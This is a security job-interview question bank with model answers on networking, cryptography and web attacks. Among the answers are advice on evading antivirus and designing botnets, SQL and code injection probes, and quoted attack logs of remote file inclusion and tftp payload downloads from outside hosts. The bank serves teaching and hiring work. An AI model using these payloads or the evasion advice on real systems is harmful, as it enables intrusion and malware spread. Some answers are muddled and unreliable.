Security Questions

(Q) What is OSI Model ?

- Check my article The OSI Model's Seven Layers Defined and Functions Explained

What makes a script fully undetectable (FUD) to antivirus software? How would you go about writing a FUD script?

A script is FUD to an antivirus when it can infect a target machine and operate without being noticed on that machine by that AV. This usually entails a script that is simple, small, and precise. To know how to write a FUD script, one must understand what the targeted antivirus is actually looking for. If the script contains events such as Hook_Keyboard(), File_Delete(), or File_Copy(), it's very likely it wil be picked up by antivirus scanners, so these events are not used. Further, FUD scripts will often mask function names with common names used in the industry, rather than naming them things like fToPwn1337(). A talented attacker might even break up his or her files into smaller chunks, and then hex edit each individual file, thereby making it even more unlikely to be detected. As antivirus software becomes more and more sophisticated, attackers become more sophisticated in response. Antivirus software such as McAfee is much harder to fool now than it was 10 years ago. However, there are talented hackers everywhere who are more than capable of writing fully undetectable scripts, and who will continue to do so. Virus protection is very much a cat and mouse game.

Who do you look up to within the field of Information Security? Why?

A standard question type. All we're looking for here is to see if they pay attention to the industry leaders, and to possibly glean some more insight into how they approach security. If they name a bunch of hackers/criminals that'll tell you one thing, and if they name a few of the pioneers that'll say another. If they don't know anyone in Security, we'll consider closely what position you're hiring them for. Hopefully it isn't a junior position.

What port does ping work over?

A trick question, to be sure, but an important one. If he starts throwing out port numbers you may want to immediately move to the next candidate. Hint: ICMP is a layer 3 protocol (it doesn't work over a port) A good variation of this question is to ask whether ping uses TCP or UDP. An answer of either is a fail, as those are layer 4 protocols.

What is the difference between the encryption standards AES and DES?

AES was selected after NIST requested proposals for cyphers which was selected in 2001. It is a block cypher of 128 bits in length. It has key size of either 128, 192, or 256 bits DES was developed in the 1970s, has a key size of 56 bits and is considered unsuitable for encryption today. it is also a block cypher.

Describe the last program or script that you wrote. What problem did it solve?

All we want to see here is if the color drains from the guy's face. If he panics then we not only know he's not a programmer (not necessarily bad), but that he's afraid of programming (bad). I know it's controversial, but I think that any high-level security guy needs some programming skills. They don't need to be a God at it, but they need to understand the concepts and at least be able to muddle through some scripting when required.

Role-Playing as an Alternative to the Onion Model

Another option for going to increasing depth, is to role-play with the candidate. You present them a problem, and they have to troubleshoot. I had one of these during an interview and it was quite valuable.You would tell them, for example, that they've been called in to help a client who's received a call from their ISP stating that one or more computers on their network have been compromised. And it's their job to fix it. They are now at the client site and are free to talk to you as the client (interviewing them), or to ask you as the controller of the environment, e.g. "I sniff the external connection using tcpdump on port 80. Do I see any connections to IP 8.8.8.8." And you can then say yes or no, etc.From there they continue to troubleshooting/investigating until they solve the problem or you discontinue the exercise due to frustration or pity.

How would you build the ultimate botnet?

Answers here can vary widely; you want to see them cover the basics: encryption, DNS rotation, the use of common protocols, obscuring the heartbeat, the mechanism for providing updates, etc. Again, poor answers are things like, "I don't make them; I stop them."

What's the difference between a threat, vulnerability, and a risk?

As weak as the CISSP is as a security certification it does teach some good concepts. Knowing basics like risk, vulnerability, threat, exposure, etc. (and being able to differentiate them) is important for a security professional. Ask as many of these as you'd like, but keep in mind that there are a few differing schools on this. Just look for solid answers that are self-consistent.

Can you outline the typical responsibilities of a Chief Security Officer (CSO)?

Chief Security Officer Role - A CSO is the executive whose ultimate role is to ensure that an organization's security function adds value and gives it a competitive advantage. A major part of a CSO's role within an organization is to help forge strong and secure connections between departments. For example, when corporate departments worry less about security vulnerabilities all around them, they may operate more smoothly with each other. A CSO who can reduce friction between departments thus adds value to an organization. Chief Security Officer Responsibilities - CSOs are responsible for enhancing and improving physical security and, increasingly, IT security. They must identify organizational protection goals and objectives, ensuring they're consistent with their organizations' strategic plans. Part of a CSO's job is to work with other executives to decide on the priority of security needs and then spend according to an organization's financial constraints and directives. CSOs also oversee a network of security directors, managers and staff and work with local, state and federal law enforcement and other security agencies.

What's the difference between Diffie-Hellman and RSA?

Diffie-Hellman is a key-exchange protocol, and RSA is an encryption/signing protocol. If they get that far, make sure they can elaborate on the actual difference, which is that one requires you to have key material beforehand (RSA), while the other does not (DH). Blank stares are undesirable.

Cryptographically speaking, what is the main method of building a shared secret over a public medium?

Diffie-Hellman. And if they get that right you can follow-up with the next one.

What's the difference between encoding, encryption, and hashing?

Encoding is designed to protect the integrity of data as it crosses networks and systems, i.e. to keep its original message upon arriving, and it isn't primarily a security function. It is easily reversible because the system for encoding is almost necessarily and by definition in wide use. Encryption is designed purely for confidentiality and is reversible only if you have the appropriate key/keys. With hashing the operation is one-way (non-reversible), and the output is of a fixed length that is usually much smaller than the input.

One of your web servers is logging multiple requests similar to the following: 201.1.199.155 - - [26/Dec/2004:01:55:48 -0500] "PUT /hacked.htm HTTP/1.0" 403 769 "Microsoft Data Access Internet Publishing Provider DAV 1.1" "-"/ What does this log entry indicate? How could you identify what the contents are of the "hacked.htm" file that the attacker is trying to upload?

Goal of question - Determine if the applicant can identify both the attack (a web defacement attempt using the HTTP PUT Method), as well as, the logging limitations of CLF. In this type of attack, the defacement text is sent in the request body and not on the URL Request line. In order to identify this data, a network sniffing application would need to be utilized. An application such as Snort could be used with a custom rule to identify this activity. Here is an example rule - alert tcp $EXTERNAL_NET any -> $HTTP_SERVERS $HTTP_PORTS (msg:"LOCAL Put attempt"; flow:to_server,established; tag:session,50,packets; pcre:"/^PUT /A"; sid:3000001; rev:1;)

You are engaged in a penetration-test where you are attempting to gain access to a protected location. You are presented with this login screen:UserID_________Password_______[login] What are some examples of you how you would attempt to gain access?

Goal of question - Determine if the applicant has a wide knowledge of different authentication vulnerabilities. They may attempt default usernames/passwords or attempt SQL Injection queries that provide an SQL true statement (such as - ' OR 1=1#).

What do you see as the most critical and current threats effecting Internet accessible websites?

Goal of question - To gauge the applicant's knowledge of current web related threats. Topics such as Denial of Service, Brute Force, Buffer Overflows, and Input Validation are all relevant topics. Hopefully they will mention information provided by web security organizations such as the Web Application Security Consortium (WASC) or the Open Web Application Security Project (OWASP).

What do you see as challenges to successfully deploying/monitoring web intrusion detection?

Goal of question - We are attempting to see if the applicant has a wide knowledge of web security monitoring and IDS issues such as: * Limitations of NIDS for web monitoring (SSL, semantic issues with understanding HTTP)* Proper logging - increasing the verboseness of logging (Mod_Security audit_log) * Remote Centralized Logging * Alerting Mechanisms * Updating Signatures/Policies

What is your definition of the term "Cross-Site Scripting"? What is the potential impact to servers and clients?

Goal of question -This question will determine if the applicant is well versed in the terminology used in web security. The applicant needs to be able to articulate highly technological topics to a wide audience. The second question will help to verify that the applicant fully understands how XSS attacks work and the impact to client information. WASC has a web security glossary of terms that may be of help - http://www.webappsec.org/glossary.html Cross-Site Scripting: (Acronym - XSS) An attack technique that forces a web site to echo client-supplied data, which execute in a user's web browser. When a user is Cross-Site Scripted, the attacker will have access to all web browser content (cookies, history, application version, etc). XSS attacks do not typically directly target the web server or application, but are rather aimed at the client. The web server is merely used as a conduit for the XSS data to be presented to the end client. See also "Client-Side Scripting".

Where do you get your security news from?

Here I'm looking to see how in tune they are with the security community. Answers I'm looking for include things like Team Cymru, Reddit, Twitter, etc. The exact sources don't really matter. What does matter is that he doesn't respond with, "I go to the CNET website.", or, "I wait until someone tells me about events.". It's these types of answers that will tell you he's likely not on top of things.

How do you change your DNS settings in Linux/Windows?

Here you're looking for a quick comeback for any position that will involve system administration (see system security). If they don't know how to change their DNS server in the two most popular operating systems in the world, then you're likely working with someone very junior or otherwise highly abstracted from the real world.

What protocol does traceroute use?

IP, but the specifics of the implementation are unique to each operating system.

You find yourself in an airport in the depths of of a foreign superpower. You're out of mobile broadband and don't trust the WI-FI. What do you do? Further, what are the potential threats from open WI-FIs?

Ideally you want all of your data to pass through an encrypted connection. This would usually entail tunneling via SSH into whatever outside service you need, over a virtual private network (VPN). Otherwise, you're vulnerable to all manner of attacks, from man-in-the-middle, to captive portals exploitation, and so on.

Who's more dangerous to an organization, insiders or outsiders?

Ideally you'll hear inquiry into what's meant by "dangerous". Does that mean more likely to attack you, or more dangerous when they do?

If you had to both encrypt and compress data during transmission, which would you do first, and why?

If they don't know the answer immediately it's ok. The key is how they react. Do they panic, or do they enjoy the challenge and think through it? I was asked this question during an interview at Cisco. I told the interviewer that I didn't know the answer but that I needed just a few seconds to figure it out. I thought out loud and within 10 seconds gave him my answer: "Compress then encrypt. If you encrypt first you'll have nothing but random data to work with, which will destroy any potential benefit from compression.

What are the common defenses against XSS?

Input Validation/Output Sanitization, with focus on the latter.

Can you give me an overview of IPsec? What is its purpose?

Internet Protocol Security (IPsec) is a protocol suite for secure Internet Protocol (IP) communications that works by authenticating and encrypting each IP packet of a communication session. IPsec includes protocols for establishing mutual authentication between agents at the beginning of the session and negotiation of cryptographic keys to be used during the session. IPsec can be used in protecting data flows between a pair of hosts (host-to-host), between a pair of security gateways (network-to-network), or between a security gateway and a host (network-to-host).[1] Internet Protocol security (IPsec) uses cryptographic security services to protect communications over Internet Protocol (IP) networks. IPsec supports network-level peer authentication, data origin authentication, data integrity, data confidentiality (encryption), and replay protection.

How does HTTP handle state?

It doesn't, of course. Not natively. Good answers are things like "cookies", but the best answer is that cookies are a hack to make up for the fact that HTTP doesn't do it itself.

Do you prefer filtered ports or closed ports on your firewall?

Look for a discussion of security by obscurity and the pros and cons of being visible vs. not. There can be many signs of maturity or immaturity in this answer.

Can you describe rainbow tables?

Look for a thorough answer regarding overall password attacks and how rainbow tables make them faster.

What are Linux's strengths and weaknesses vs. Windows?

Look for biases. Does he absolutely hate Windows and refuse to work with it? This is a sign of an immature hobbyist who will cause you problems in the future. Is he a Windows fanboy who hates Linux with a passion? If so just thank him for his time and show him out. Linux is everywhere in the security world.

What is Cross-Site Request Forgery?

Not knowing this is more forgivable than not knowing what XSS is, but only for junior positions. Desired answer: when an attacker gets a victim's browser to make requests, ideally with their credentials included, without their knowing. A solid example of this is when an IMG tag points to a URL associated with an action, e.g. http://foo.com/logout/. A victim just loading that page could potentially get logged out from foo.com, and their browser would have made the action, not them (since browsers load all IMG tags automatically).

What's the difference between symmetric and public-key cryptography

Standard stuff here: single key vs. two keys, etc, etc.

What are your first three steps when securing a Linux server?

Their list isn't key here (unless it's bad); the key is to not get panic.

(Q) What is TCP ?

- Check my article What is Transmission Control Protocol (TCP )

What application generated the log file entry below? What type of attack is this? Assuming the index.php program is vulnerable, was this attack successful?

========================================/Request: 200.158.8.207 - - [09/Oct/2004:19:40:46 --0400] "POST /index.php HTTP/1.1" 403/743/Handler: cgi-script/----------------------------------------/POST /index.php HTTP/1.1/Host: www.foo.com/Connection: keep-alive/Accept: */*/Accept-Language: en-us/Content-Encoding: gzip, deflate/Content-Type: application/x-www-form-urlencoded/User-Agent: Mozilla 4.0 (Linux)//Content-Length: 65/X-Forwarded-For: 200.158.8.207/mod_security-message: Access denied with code 403. Pattern match "uname\x20-a" at/ POST_PAYLOAD/mod_security-action: 403//65/lid=http://th3.ownz.p5.org.uk/lila.jpg?&cmd=cd /tmp;id;lsuname -a// Goal of question - to verify that the applicant can interpret various web log files, identify attacks and possible impacts. The Mod_Security Apache module generated this data in the audit_log file. The log entry indicates that an attacker is attempting to exploit a PHP file inclusion vulnerability in the index.php script. The commands being passed are in the POST PAYLOAD of the command. This attack was not successful for the following two reasons:* The mod_security-message header indicates that Mod_Security blocked this request based on a converted Snort web-attack rule when it identified the "uname -a" data in the POST PAYLOAD.* The attacker also made a typo in the OS commands being passed in the POST PAYLOAD. She did not include a semicolon ";" between the ls and uname commands. The target host would fail to execute the "lsuname" command.

What online resources do you use to keep abreast of web security issues? Can you give an example of a recent web security vulnerability or threat?

Goal of question - Determine if the applicant utilizes computer security resources such as CERT, SANS Internet Storm Center or ICAT. Email lists such as securityfocus, bugtraq, SANS @RISK, etc. are also good resources. Recent examples of threats will vary depending on current events, but issues such as new web based worms (PHP Santy Worm) or applications, which are in wide use (awstats scripts) are acceptable.

What are the most important steps you would recommend for securing a new web server? Web application?

Goal of question - Once again, there is no right or wrong answer, however we are interested in what the applicant views as important. Web Server Security: * Update/Patch the web server software * Minimize the server functionality - disable extra modules * Delete default data/scripts * Increase logging verboseness * Update Permissions/Ownership of files | Web Application Security: * Make sure Input Validation is enforced within the code - Security QA testing * Configured to display generic error messages * Implement a software security policy * Remove or protect hidden files and directories

Imagine that we are running an Apache reverse proxy server and one of the servers we are proxy for is a Windows IIS server. What does the log entry suggest has happened? What would you do in response to this entry? * 68.48.142.117 - - [09/Mar/2004:22:22:57 -0500] "GET /c/winnt/system32/ * cmd.exe?/c+dir HTTP/1.0" 200 566 "-" "-" * 68.48.142.117 - - [09/Mar/2004:22:23:48 -0500] "GET /c/winnt/system32/ * cmd.exe?/c+tftp%20-%2068.48.142.117%20GET%20cool.dll%20c:\\httpodbc.dll HTTP/1.0" 200 566 "-" "-"

Goal of question - To see if the applicant is fluent at reading web server log files in the Common Log Format (CLF). In this scenario, the client system (68.48.142.117) is infected with the Nimda worm. These requests will not affect our Apache proxy server since this is a Microsoft vulnerability. While it does not impact Apache, the logs do indicate that the initial request was successful (status code of 200). The Nimda worm will only send the level 2 request (trying to use Trivial FTP to infect the target) if the initial request is successful. Depending on the exact proxying rules in place, it would be a good idea to inspect the internal IIS server to verify that it has not been compromised.

What kind of network do you have at home?

Good answers here are anything that shows you he's a computer/technology/security enthusiast and not just someone looking for a paycheck. So if he's got multiple systems running multiple operating systems you're probably in good shape. What you don't want to hear is, "I get enough computers when I'm at work..." I've yet to meet a serious security guy who doesn't have a considerable home network-or at least access to one, even if it's not at home.

Why is DNS monitoring important?

If they're familiar with infosec shops of any size, they'll know that DNS requests are a treasure when it comes to malware indicators.

What are the various ways to handle account brute forcing?

Look for discussion of account lockouts, IP restrictions, fail2ban, etc.

What kind of attack is a standard Diffie-Hellman exchange vulnerable to?

Man-in-the-middle, as neither side is authenticated.

How does one defend against CSRF?

Nonces required by the server for each page or each request is an accepted, albeit not foolproof, method. Again, we're looking for recognition and basic understanding here-not a full, expert level dissertation on the subject. Adjust expectations according to the position you're hiring for.

What's the difference between HTTP and HTML?

Obviously the answer is that one is the networking/application protocol and the other is the markup language, but again, the main thing you're looking for is for him not to panic.

What is security level management?

SLM is oriented towards the phases of the Deming Cycle/Plan-Do-Check-Act (PDCA) Cycle: within the scope of SLM, abstract security policies or compliance guidelines at a company are transposed into operative, measurable specifications for the IT security infrastructure. The operative aims form the security level to be reached.

What's the difference between stored and reflected XSS?

Stored is on a static page or pulled from a database and displayed to the user directly. Reflected comes from the user in the form of a request (usually constructed by an attacker), and then gets run in the victim's browser when the results are returned from the site.

Are open-source projects more or less secure than proprietary ones?

The answer to this question is often very telling about a given candidate. It shows 1) whether or not they know what they're talking about in terms of development, and 2) it really illustrates the maturity of the individual (a common theme among my questions). My main goal here is to get them to show me pros and cons for each. If I just get the "many eyes" regurgitation then I'll know he's read Slashdot and not much else. And if I just get the "people in China can put anything in the kernel" routine then I'll know he's not so good at looking at the complete picture.The ideal answer involves the size of the project, how many developers are working on it (and what their backgrounds are), and most importantly — quality control. In short, there's no way to tell the quality of a project simply by knowing that it's either open-source or proprietary. There are many examples of horribly insecure applications that came from both camps.

Can you give me an overview of how public-key cryptography works?

Suppose we have a website that we wish to provide secure communications with through a browser. We can create a public/private key pair that has a few important properties - If something is encrypted with the public key, it can only be decrypted with the private key - having the public key provides very little leverage to someone trying to guess the private key. When you connect a browser to the website, you encrypt a symmetric key using the public key. Since the only way to decrypt that is with the matching private key, only the server can decrypt that successfully. When they send their acknowledgement, it is encrypted with the symmetric key that the browser sent. The browser should then be able to successfully decrypt the message and the connection is then established. (if not, then something was tampered with !) But this setup is not fully secure. If the browser is 'tricked' into going to a site that is pretending to be the site you wanted to go to, then you have just verified the key for the malicious site. Now let's take the CA. They validate that the requestor of the certificate is the 'true' owner of the site. If they are satisfied, then they will create a hash of the data encrypted with the CA public certificate that contains - unique serial number - certificate owner - ca name - ca digitial signature - hash of the website's public key The browser can perform this same action and match it with the certificate.

Describe a Unix traceroute hitting google.com at all seven layers of the OSI model..

The top 3-4 levels of the OSI model are not used (depending on the the operating system) traceroute makes a request to the networking library to send either an ICMP (layer 3) or UDP (layer 4) packet to the destination with a TTL of 1, the response that is returned includes information presented to the user and the TTL is increased to 2 for the next packet and sent. This proceeds until the destination is reached. The packets themselves are constructed at the bit level for level 1, and broken down to individual frames in level 2. This frame is packed in a 'packet' in layer 3. Then the remaining transformations depend on whether UDP is used or ICMP.

You're tasked with setting up an email encryption system for certain employees of a company. What's the first thing you should be doing to set them up? How would you distribute the keys?

The first task is to do a full clean and make sure that the employees' machines aren't compromised in any way. This would usually involve something along the lines of a selective backup. One would take only the very necessary files from one computer and copy them to a clean replica of the new host. We give the replica an internet connection and watch for any suspicious outgoing or incoming activity. Then one would perform a full secure erase on the employee's original machine, to delete everything right down to the last data tick, before finally restoring the backed up files.The keys should then be given out by transferring them over wire through a machine or device with no other connections, importing any necessary .p7s email certificate files into a trusted email client, then securely deleting any trace of the certificate on the originating computer.The first step, cleaning the computers, may seem long and laborious. Theoretically, if you are 100% certain that the machine is in no way affected by any malicious scripts, then of course there is no need for such a process. However in most cases, you'll never know this for sure, and if any machine has been backdoored in any kind of way, this will usually mean that setting up secure email will be done in vain.

If I'm on my laptop, here inside my company, and I have just plugged in my network cable. How many packets must leave my NIC in order to complete a traceroute to twitter.com?

The key here is that they need to factor in all layers: Ethernet, IP, DNS, ICMP/UDP, etc. And they need to consider round-trip times. What you're looking for is a realization that this is the way to approach it, and an attempt to knock it out. A bad answer is the look of WTF on the fact of the interviewee.This could be asked as a final phase of a multi-step protocol question that perhaps starts with the famous, "What happens when I go to Google.com?"

What are your first three steps when securing a Windows server?

Their list isn't key here (unless it's bad); the key is to not get panic.

What's the goal of information security within an organization?

This is a big one. What I look for is one of two approaches; the first is the über-lockdown approach, i.e. "To control access to information as much as possible, sir!" While admirable, this again shows a bit of immaturity. Not really in a bad way, just not quite what I'm looking for. A much better answer in my view is something along the lines of, "To help the organization succeed."This type of response shows that the individual understands that business is there to make money, and that we are there to help them do that. It is this sort of perspective that I think represents the highest level of security understanding—-a realization that security is there for the company and not the other way around.

What is the primary reason most companies haven't fixed their vulnerabilities?

This is a bit of a pet question for me, and I look for people to realize that companies don't actually care as much about security as they claim to-otherwise we'd have a very good remediation percentage. Instead we have a ton of unfixed things and more tests being performed.Look for people who get this, and are ok with the challenge.

How exactly does traceroute/tracert work at the protocol level?

This is a fairly technical question but it's an important concept to understand. It's not natively a "security" question really, but it shows you whether or not they like to understand how things work, which is crucial for an Infosec professional. If they get it right you can lighten up and offer extra credit for the difference between Linux and Windows versions.The key point people usually miss is that each packet that's sent out doesn't go to a different place. Many people think that it first sends a packet to the first hop, gets a time. Then it sends a packet to the second hop, gets a time, and keeps going until it gets done. That's incorrect. It actually keeps sending packets to the final destination; the only change is the TTL that's used. The extra credit is the fact that Windows uses ICMP by default while Linux uses UDP.

If you were a site administrator looking for incoming CSRF attacks, what would you look for?

This is a fun one, as it requires them to set some ground rules. Desired answers are things like, "Did we already implement nonces?", or, "That depends on whether we already have controls in place..." Undesired answers are things like checking referrer headers, or wild panic.

You find PHP queries overtly in the URL, such as /index.php=?page=userID. What would you then be looking to test?

This is an ideal situation for injection and querying. If we know that the server is using a database such as SQL with a PHP controller, it becomes quite easy. We would be looking to test how the server reacts to multiple different types of requests, and what it throws back, looking for anomalies and errors.One example could be code injection. If the server is not using authentication and evaluating each user, one could simply try /index.php?arg=1;system('id') and see if the host returns unintended data.

As a corporate Information Security professional, what's more important to focus on: threats or vulnerabilities?

This one is opinion-based, and we all have opinions. Focus on the quality of the argument put forth rather than whether or not they they chose the same as you, necessarily. My answer to this is that vulnerabilities should usually be the main focus since we in the corporate world usually have little control over the threats.Another way to take that, however, is to say that the threats (in terms of vectors) will always remain the same, and that the vulnerabilities we are fixing are only the known ones. Therefore we should be applying defense-in-depth based on threat modeling in addition to just keeping ourselves up to date.Both are true, of course; the key is to hear what they have to say on the matter.

What's more secure, SSL or HTTPS?

Trick question: these are not mutually exclusive. Look for a smile like they caught you in the cookie jar. If they're confused, then this should be for an extremely junior position.

If you were to start a job as head engineer or CSO at a Fortune 500 company due to the previous guy being fired for incompetence, what would your priorities be? [Imagine you start on day one with no knowledge of the environment]

We don't need a list here; we're looking for the basics. Where is the important data? Who interacts with it? Network diagrams. Visibility touch points. Ingress and egress filtering. Previous vulnerability assessments. What's being logged an audited? Etc. The key is to see that they could quickly prioritize, in just a few seconds, what would be the most important things to learn in an unknown situation.

How would you implement a secure login field on a high traffic website where performance is a consideration?

We're looking for a basic understanding of the issue of wanting to serve the front page in HTTP, while needing to present the login form via HTTPs, and how they'd recommend doing that. A key piece of the answer should center around avoidance of the MiTM threat posed by pure HTTP. Blank stares here mean that they've never seen or heard of this problem, which means they're not likely to be anything near pro level.

Imagine that we are running an Apache reverse proxy server and one of the servers we are proxy for is a Windows IIS server. * 68.48.142.117 - - [09/Mar/2004:22:22:57 -0500] "GET /c/winnt/system32/ * cmd.exe?/c+dir HTTP/1.0" 200 566 "-" "-" * 68.48.142.117 - - [09/Mar/2004:22:23:48 -0500] "GET /c/winnt/system32/ * cmd.exe?/c+tftp%20-%2068.48.142.117%20GET%20cool.dll%20c:\\httpodbc.dll HTTP/1.0" 200 566 "-" "-" If you were not using Apache as the reverse proxy, what Microsoft application/tool could you use to mitigate this attack?

You could use either Microsoft's Internet and Security Acceleration (ISA) server as a front-end proxy or implement URLScan on the target IIS server. The urlscan.ini file has the AllowDotInPath directive which will block directory traversal attempts.

In public-key cryptography you have a public and a private key, and you often perform both encryption and signing functions. Which key is used for which function?

You encrypt with the other person's public key, and you sign with your own private. If they confuse the two, don't put them in charge of your PKI project.

What is salting, and why is it used?

You purposely want to give the question without context. If they know what salting is just by name, they've either studied well or have actually been exposed to this stuff for a while.

What are the advantages offered by bug bounty programs over normal testing practices?

You should hear coverage of many testers vs. one, incentivization, focus on rare bugs, etc.

What exactly is Cross Site Scripting?

You'd be amazed at how many security people don't know even the basics of this immensely important topic. We're looking for them to say anything regarding an attacker getting a victim to run script content (usually JavaScript) within their browser.

:How does traceroute work?

packets are sent to the destination with a TTL (TIme To Live) setting starting at 1, then increasing by 1 each time until its destination is reached. When the packet reaches it's end of life, the error response that is returned is converted into output that describes the location of the router where it ended.